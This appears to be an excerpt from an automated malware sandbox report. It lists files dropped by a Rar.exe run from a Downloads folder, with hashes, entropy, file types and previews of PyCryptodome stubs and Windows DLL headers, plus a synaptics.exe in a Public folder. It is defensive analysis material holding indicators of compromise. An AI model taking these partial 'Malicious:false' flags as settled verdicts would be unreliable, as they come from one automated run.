                                                                                                                                                                                      SSDEEP:96:+IlTHsKL8yk4PiQIXA+7nC/YlPAsAugmSfNZPqjp:bdiAGC/qAVAd
                                                                                                                                                                                      MD5:B786224B4B79C69778DB52AC58F83E63
                                                                                                                                                                                      SHA1:B2CCDF0809F838CFFF9C26D07857A01FE2F5AB8A
                                                                                                                                                                                      SHA-256:512A0D196EFEDAB1E320041D54BFFBF7366C4D35EA95D7290732DB1FD8A946EA
                                                                                                                                                                                      SHA-512:EA77F39AAC1E3EAB9966F45693591FE8F696929858D89329CB84B54D0C590A431C548188B003DF04DF513C3F33AFA2E67B30932CE5E981EF00A1B6B9D429BAD0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from Crypto.Util._raw_api import (VoidPointer, SmartPointer,.. create_string_buffer,.. get_raw_buffer, c_size_t,.. c_uint8_ptr, c_ubyte)....from Crypto.Util.number import long_to_bytes..from Crypto.Util.py3compat import bchr....from .keccak import _raw_keccak_lib......class TurboSHAKE(object):.. """A TurboSHAKE hash object... Do not instantiate directly... Use the :func:`new` function... """.... def __init__(self, capacity, domain_separation, data):.... state = VoidPointer().. result = _raw_keccak_lib.keccak_init(state.address_of(),.. c_size_t(capacity),.. c_ubyte(12)) # Reduced number of rounds.. if result:.. raise ValueError("Error %d while instantiating TurboSHAKE".. % result).. self._state = SmartPointer(state.get()
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):591
                                                                                                                                                                                      Entropy (8bit):5.065116097079714
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1REYBlRE1B9YplvIY39fIL1AzvQ1aEeEWmodFwIiRh72CX5BgRE3GH1dmF:1REOC1bClT39fIRAqYi6LiRh71mEc1dA
                                                                                                                                                                                      MD5:B0223AB14FDA42D6811F55259F9BE663
                                                                                                                                                                                      SHA1:409E32782D3A86B66CEBABFA703D72BD682C069A
                                                                                                                                                                                      SHA-256:B7617049D0B2131180EA0B73AE8CAC73839A27D394BE6B4D9796F9D0198DE6B7
                                                                                                                                                                                      SHA-512:4A1180FD51BFE2A50EB344A19EFB954C5071218C169F14AC7A86D72BC45B946A35E7CDC4A06E616A20948F235D501AD24B113F2B9ABF56D68F4100F0C2DE8410
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Union, Optional..from typing_extensions import TypedDict, Unpack, NotRequired....Buffer = Union[bytes, bytearray, memoryview]....class TurboSHAKE(object):.... def __init__(self, capacity: int, domain_separation: int, data: Union[Buffer, None]) -> None: ..... def update(self, data: Buffer) -> TurboSHAKE : ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer]=None) -> TurboSHAKE: .......class Args(TypedDict):.. domain: NotRequired[int].. data: NotRequired[Buffer]....def new(**kwargs: Unpack[Args]) -> TurboSHAKE: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):779
                                                                                                                                                                                      Entropy (8bit):4.819439474706594
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1sumDc9v5Wb6SSkBXM6WhieoHvsPVEzmSqQeEFAcVG/Ebbj9jWAEsI:1sTDg5ESkOhNZPMmSq2FoM9jRI
                                                                                                                                                                                      MD5:630FCFB160AFD4A4B095C35901777556
                                                                                                                                                                                      SHA1:0F039C3A2C5205D2105A79B5EB2777884DC8E490
                                                                                                                                                                                      SHA-256:AD79E152A2C83EE90AC61FF7245DF570673FBE28720D9DE8E07E2FDDBF0E51DB
                                                                                                                                                                                      SHA-512:9ED88DA711066739EDB47EFB65755A57F9C18402A9AD5C112CF32BE13B97615C2C835A46C8E4E5CD89CBDB5EE6A9BE181A4CC42A1D6F4617F8AACB3C43F76878
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from .TurboSHAKE128 import TurboSHAKE....def new(**kwargs):.. """Create a new TurboSHAKE256 object..... Args:.. domain (integer):.. Optional - A domain separation byte, between 0x01 and 0x7F... The default value is 0x1F... data (bytes/bytearray/memoryview):.. Optional - The very first chunk of the message to hash... It is equivalent to an early call to :meth:`update`..... :Return: A :class:`TurboSHAKE` object.. """.... domain_separation = kwargs.get('domain', 0x1F).. if not (0x01 <= domain_separation <= 0x7F):.. raise ValueError("Incorrect domain separation value (%d)" %.. domain_separation).. data = kwargs.get('data').. return TurboSHAKE(64, domain_separation, data=data)..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):318
                                                                                                                                                                                      Entropy (8bit):5.138819601387305
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:1REYBXa4REsuB9cebopy1LxyJQmUUzrIY3MT7O3ymK95lvdgzSNFIF:1REYBXa4RE1B9YSsumtvIY3eH1dmF
                                                                                                                                                                                      MD5:0F8CE87AD72ECACADED5EB6869C0C063
                                                                                                                                                                                      SHA1:4C8EBDA5C1826749B747BF268036DC11A1FD9CC3
                                                                                                                                                                                      SHA-256:86DEA501F8ED56BAE7652415243B38845AB1C94A1E4AD0E737A98A37A80235EA
                                                                                                                                                                                      SHA-512:8CD3AF34C3FD94E6DBE15575BB3AC6C84AFBAF14067066E53EEE3A727866C5E626E323C6ED4736186E21056D4A27EF57184DFAE378A9B8E53210F340051649ED
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Union..from typing_extensions import TypedDict, Unpack, NotRequired....from .TurboSHAKE128 import TurboSHAKE....Buffer = Union[bytes, bytearray, memoryview]....class Args(TypedDict):.. domain: NotRequired[int].. data: NotRequired[Buffer]....def new(**kwargs: Unpack[Args]) -> TurboSHAKE: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13312
                                                                                                                                                                                      Entropy (8bit):5.577128040106931
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ioG8PEXpAeBWctWJmI5jO1hJycHFvleUAH2Nh2m4AjWoKemMVnQ8NM:i3pAu4JmAjGMajC2NhqOWoFnQm
                                                                                                                                                                                      MD5:924B83B89DCEFB7C6DCB44A7D58F8EE2
                                                                                                                                                                                      SHA1:15A755D52961B5DBC38C2DB1346089717B5E107C
                                                                                                                                                                                      SHA-256:49DC3F64559A5EC163034EE29577EB45A242A5D2EFD6B9364110D26E8AE325FD
                                                                                                                                                                                      SHA-512:C0F9687DFB8A2EDEB227C00D07478F54B66692F8110FA146B00EB345D450976C741CC0178D919386A5A117E621A7A0A1BAFC3744102A3E6D2CB5FFEDE20B2EAA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...co..co..co..j.=.go..v...ao..(...`o..co..Ao..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.Q.bo..Y..bo..Richco..........................PE..L...4..e...........!...%............N........0...............................p............@..........................6.......6..d....P.......................`..T...p2...............................1..@............0..x............................text............................... ..`.rdata..4....0......."..............@..@.data........@......................@....rsrc........P.......0..............@..@.reloc..T....`.......2..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11264
                                                                                                                                                                                      Entropy (8bit):5.620531181419531
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:yEG8PEXpAeBWctWJmI5jOIXqDy5ucTuJPNTWpaDGNwlQ/+dpXMVnQIN6i:ybpAu4JmAjnXqsR9paDGulQ/amnQS6i
                                                                                                                                                                                      MD5:48E08209729FD94B37B95B035D2BD181
                                                                                                                                                                                      SHA1:0DF8E560290E36888691FF5750F3802A58687FA1
                                                                                                                                                                                      SHA-256:1DBAE6101BBEB5AAAB8790536FC6A824C979C5C5E19F16A73AA8853FF3CF1C0A
                                                                                                                                                                                      SHA-512:8502D032D030B79AAE62F2A45222757CDFA721EC8E350C1E5DA66A5D561C675F72EB149F9772379CC657F6B6C2EE3D4D57F1660EEB58BCAE77BE038060697028
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...co..co..co..j.=.go..v...ao..(...`o..co..Ao..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.Q.bo..Y..bo..Richco..........................PE..L...4..e...........!...%............N........0...............................p............@..........................5.......6..d....P.......................`..X...P2...............................1..@............0..x............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc..X....`.......*..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                      Entropy (8bit):5.434336431091903
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:oYYSEPEmRc+ZWcVWJjRjO9YRb/qKEBaQMOjMVn6LlN:oRc2AJNjsYF/7EbMBn6L
                                                                                                                                                                                      MD5:651E355E1B12047955D8E2D23DAF98C4
                                                                                                                                                                                      SHA1:5599946F2DBC2BE5603AB3B21CC5605F25166390
                                                                                                                                                                                      SHA-256:261C787C28C421432D1BA8B07D9D2FDBED73C2F8A5B27D4CF755AFA6409C05CD
                                                                                                                                                                                      SHA-512:8FDA0E2A74FB6F774A33766306D1143EC0DA429B6F3622708F4FCA9E7E2BB932029A416780CA1758ADC8D1B2F7E561293FA6D57F839B03847B05F17C0C1ECA4A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.!.go..v...ao..(...`o..co..@o..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.M.bo..Y..bo..Richco..................PE..L...-..e...........!...%............N........0...............................p............@..........................6.......6..d....P.......................`.......2...............................1..@............0..|............................text............................... ..`.rdata..(....0......................@..@.data........@......."..............@....rsrc........P.......$..............@..@.reloc.......`.......&..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11264
                                                                                                                                                                                      Entropy (8bit):5.7491431618529685
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:oYRoY1PEWZc+BWctWJjRjOq8AKyaw5DsfH2kVOCGMVn60N:TZcu4JNjci9yHxV5n6e
                                                                                                                                                                                      MD5:B186B120E486DB9B4132A38E5C34C960
                                                                                                                                                                                      SHA1:AB24AE7520CE68DAA9725703F2BA7C05F7E23588
                                                                                                                                                                                      SHA-256:CD9F033356D2689212215C868763F6C43D4A510D1907EBFB1B4F532534733D1F
                                                                                                                                                                                      SHA-512:A45C43ED7D7CC793236BE6D822D231F99A35F9BAA0AE63AA7ED2EB6816EAE3ED38DCB5FC98C10AAE1B433D2366E0DB26814AACC5038114A4096EDFD20AD61C18
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.!.go..v...ao..(...`o..co..@o..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.M.bo..Y..bo..Richco..................PE..L......e...........!...%............N........0...............................p............@.........................@5.......5..d....P.......................`..l....1...............................0..@............0..|............................text............................... ..`.rdata..h....0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc..l....`.......*..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12288
                                                                                                                                                                                      Entropy (8bit):5.806427442388011
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:oY734lPEG/JJu+qWcbWJ96QjOgWZIdfykST4qTi4CR+jGoSmiMVn63vIN:psJcriJfjlmgS0qTtm+jlSmdn63vS
                                                                                                                                                                                      MD5:83DB203273B63DB1D1666840BB0E71D9
                                                                                                                                                                                      SHA1:157B58BD6A089282836F1A3723432DC95E1DF4D5
                                                                                                                                                                                      SHA-256:F7A3D04C0CB8301506B89B44DE5889016347D1607F15D2ED16712CE06A2E232D
                                                                                                                                                                                      SHA-512:3DC039BE87489B316FF8D809135C29785203AA265D4A5117D3001CFD71A1DE7870B2EDEB76AA6596DB73A9043F021A498AB3C3E00628AF5992392CF80457CA6F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.!.go..v...ao..(...`o..co..@o..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.M.bo..Y..bo..Richco..................PE..L......e...........!...%............N........0...............................p............@..........................5.......5..d....P.......................`..l...x1...............................0..@............0..|............................text...+........................... ..`.rdata..H....0....... ..............@..@.data........@.......*..............@....rsrc........P.......,..............@..@.reloc..l....`......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11264
                                                                                                                                                                                      Entropy (8bit):5.413442037310423
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:scsLHPEXpAlBWctWJmI5jOLt/1k9nYc9MCxniMVnAQN2:scvpA94JmAjMwh9NxndnA6
                                                                                                                                                                                      MD5:3997387AA13BC2BE8C6D75A6DA925EF3
                                                                                                                                                                                      SHA1:B12EADD0FFEFA10AEB6B70659AEC949D1975C770
                                                                                                                                                                                      SHA-256:338BCDEAD74DFB728252B54F481117A0B5B40C86A70C95B304FF6A1E5DA4A524
                                                                                                                                                                                      SHA-512:580E7F65C519C33C710A2917113C56812EF05A0F12E6D4DEF3BB2F42E0CB744C9C1BBFE87A54AADEAAA3E754524C6F77E36F213A401EF50ABF8B9052583D068C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...co..co..co..j.=.go..v...ao..(...`o..co..Ao..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.Q.bo..Y..bo..Richco..........................PE..L...4..e...........!...%............N........0...............................p............@..........................6......X7..d....P.......................`.......3..............................P2..@............0..x............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`.......*..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                      Entropy (8bit):6.076265358698928
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:kvZMACJPjbBHhz0qiXVPbRcySH5mxdnpLcIZpLq6/na3+T:kBC9BHhz0qiFPFphdpLcIZla3+T
                                                                                                                                                                                      MD5:E432E1E5AD35F45DC34CD034CCAED111
                                                                                                                                                                                      SHA1:9CA70728B955C5D0FF8C6C3871D80946A259D603
                                                                                                                                                                                      SHA-256:679CCF793D3D9EF4F0B4B8647F022DA4F40847D3084A4D84441CFBEFBBA37C6F
                                                                                                                                                                                      SHA-512:3B7B313313B81965384F036CDEC7145CA0AC67F5C8AD8DAB60E4710CB8348314BD8DA1BAF9982D4B0BAD378B1089A1D5F5F3ECACF0ECB0CF8412F2F4993BAF1D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.!.go..v...ao..(...`o..co..@o..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.M.bo..Y..bo..Richco..................PE..L......e...........!...%.,..........N........@............................................@..........................E.......E..d....`.......................p..x...xA...............................@..@............@..|............................text....+.......,.................. ..`.rdata..P....@.......0..............@..@.data........P.......:..............@....rsrc........`.......<..............@..@.reloc..x....p.......>..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18432
                                                                                                                                                                                      Entropy (8bit):5.970456337666413
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:0Bah4UKJx1LjJ+EX97NmCFe3z1gnH1bSh1ci75EhCp8J1hmaZOXqna3I:0KKD7tI14cHh6f1dZy0a3I
                                                                                                                                                                                      MD5:F1BCB5201E274FA9696AE330A5E06056
                                                                                                                                                                                      SHA1:9A1EDF31C17B0565C2687BF61010EFE305CDC7C2
                                                                                                                                                                                      SHA-256:C0AF73B1F8BC6B86995DAC103AE5A853744914762086B57E3BC8DF29CD5233FF
                                                                                                                                                                                      SHA-512:84CA339E40074F9641A0A8409CB78E5731A5784AC11A13021A5A5AFAE8B78C5FCD81BB8E5BF1FAEBC3DD088B35B4E8C842AEBA8A12D519211CE27A54CB76A477
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.!.go..v...ao..(...`o..co..@o..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.M.bo..Y..bo..Richco..................PE..L...0..e...........!...%.2..........N........P............................................@..........................V.......V..d....p..........................t....R...............................Q..@............P..|............................text...b0.......2.................. ..`.rdata..`....P.......6..............@..@.data...,....`.......B..............@....rsrc........p.......D..............@..@.reloc..t............F..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18432
                                                                                                                                                                                      Entropy (8bit):5.964747110712993
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Dah4UKJx1LjuX7b9hCFizDgnH1bSh1ci75EhCp8J1hm6Zfqna3I:IKQyID4cHh6f19Zf0a3I
                                                                                                                                                                                      MD5:DFE083D26D047BEC3349C6345DB1AFA5
                                                                                                                                                                                      SHA1:1C02FEEA790456083EE4ACDD4263F84B8A920CCD
                                                                                                                                                                                      SHA-256:3C82DB1BCCE7BCBE4CCCD6716F92B900957D279AFC7F7A2A59523A40D3009617
                                                                                                                                                                                      SHA-512:542BAABFC90D905A67F2D62B1FD27A0053145D5F532EDB1CBB005258EDC72F0D448570F513AA5D8108857727966E28553741287073032A35B9E6E3787CDB4FD6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.!.go..v...ao..(...`o..co..@o..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.M.bo..Y..bo..Richco..................PE..L.../..e...........!...%.2..........N........P............................................@..........................V.......V..d....p..........................t....R...............................Q..@............P..|............................text...B0.......2.................. ..`.rdata..`....P.......6..............@..@.data...,....`.......B..............@....rsrc........p.......D..............@..@.reloc..t............F..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):38912
                                                                                                                                                                                      Entropy (8bit):6.2081292481440435
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:FqkeGhOJ8QjWduVqYatNaYLKpFHiAn3F2gcZc8Mq1GJ8ehedP1na3I:FjlOiBCtCN+YkFAMBJ8weJ9a3I
                                                                                                                                                                                      MD5:AA8CAF413B18D9548729D5F455B2DA69
                                                                                                                                                                                      SHA1:0C5830B555C9FCC7AEA56E4256192ED5D5BF0417
                                                                                                                                                                                      SHA-256:356B0EE34C719953D5122A835EEAA6A4A334C99A8873A6B3E7B2B45641FBE3D2
                                                                                                                                                                                      SHA-512:235598C1DEFB745F54A7A173D42E9B344751E242207EF6B8BC362AEA057896B13117141AA9464BB7B5BBCACA5F0B1C87DF158220765CB4D11ABF490ECD2328D4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........m..m..m...*.m.....m......m..m..m.....m.....m.....m....m....m...F.m....m..Rich.m..................PE..L...2..e...........!...%............N.....................................................@.....................................d...............................t...@...................................@...............|............................text...e........................... ..`.rdata.. ...........................@..@.data...4...........................@....rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):39424
                                                                                                                                                                                      Entropy (8bit):6.239644424186895
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:C8D29MuJvjdh/9qd8tNaYLKpFHiAn3F2gcZc8Mq1GJ8ehedfQna34J:C8zuznycN+YkFAMBJ8welKa34J
                                                                                                                                                                                      MD5:AD97617D4BC580E9C5BAE880865DEF77
                                                                                                                                                                                      SHA1:88FC140782BA5A38D14D38F996C1391E0BCAA573
                                                                                                                                                                                      SHA-256:B805D429D9CFDDD2621A4A6CA42EE8183C9506D3BC790A83E5B1B04C297B7B2D
                                                                                                                                                                                      SHA-512:326CB3E9434BCB878FD3E30E609D5F3C963294CBF75A228768AD3EBF8110AC0A3EBA2EB212B5E7D9157FA290EE3EA07E9094FB772D0608EB2622E0230D0D51EF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........m..m..m...*.m.....m......m..m..m.....m.....m.....m....m....m...F.m....m..Rich.m..................PE..L...3..e...........!...%............N.....................................................@.........................@.......(...d.......................................................................@...............|............................text............................... ..`.rdata..............................@..@.data...4...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3008
                                                                                                                                                                                      Entropy (8bit):5.230297505186991
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:KIB0jcQHMsvI/S3oCFXcgHP76Mn6Gsh2L4ZMGdnP7rUjDDM+rDttfakWGL8A:dFQHvoc76MneU0P+X
                                                                                                                                                                                      MD5:273FE2618CACD783CC30C94EB92B1F76
                                                                                                                                                                                      SHA1:0E303EDEB936B8F552F30AAAF4953B9A6F29B8D4
                                                                                                                                                                                      SHA-256:79AA947F1C29D838ADF9FB696FE5EFC169FA67C73CCEE8ABB89FD65985D6B440
                                                                                                                                                                                      SHA-512:01BF678948D0C0F6FB02718D2619140580B0F735D02D87433136DA65916C7A8C8C4E7F734DF2B063209693A56BD3F8D2D4E5E2E879543E9EEB5425838B0D0315
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2085
                                                                                                                                                                                      Entropy (8bit):5.17608688273199
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:aF9+C++h+N+9+jZ+c+4+8+v1tZccj8ny7Mk8kjqu5BCViGHh29398O4Q:aF94UgQY7nTaZccj8ny7Mk8kjqu5BCVO
                                                                                                                                                                                      MD5:36A0E0920BC50C5AC662383955E311A1
                                                                                                                                                                                      SHA1:FFF119192B3BB62C9EC36F076FE2F65012BB0DEA
                                                                                                                                                                                      SHA-256:A4763996875B02499733BA1336240470992D9B7C5B1AF986DD0FE6FFC52F5642
                                                                                                                                                                                      SHA-512:78B5C6B11A20678902A236FAE88E1E78D933475D5AD618054B6D0FF9FCC6F9F2A1CD92B8D745D92CDDA9BDDA1DB621333ACAEAAF3E3332E7DD8094E4CAAD4D34
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import overload..from typing_extensions import Literal....from Crypto.Hash.SHA1 import SHA1Hash..from Crypto.Hash.SHA224 import SHA224Hash..from Crypto.Hash.SHA256 import SHA256Hash..from Crypto.Hash.SHA384 import SHA384Hash..from Crypto.Hash.SHA512 import SHA512Hash..from Crypto.Hash.SHA3_224 import SHA3_224_Hash..from Crypto.Hash.SHA3_256 import SHA3_256_Hash..from Crypto.Hash.SHA3_384 import SHA3_384_Hash..from Crypto.Hash.SHA3_512 import SHA3_512_Hash....@overload..def new(name: Literal["1.3.14.3.2.26"]) -> SHA1Hash: .....@overload..def new(name: Literal["SHA1"]) -> SHA1Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.4"]) -> SHA224Hash: .....@overload..def new(name: Literal["SHA224"]) -> SHA224Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.1"]) -> SHA256Hash: .....@overload..def new(name: Literal["SHA256"]) -> SHA256Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.2"]) -> SHA384Hash: .....@overload..def new(name: Lit
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7296
                                                                                                                                                                                      Entropy (8bit):5.2592275358789
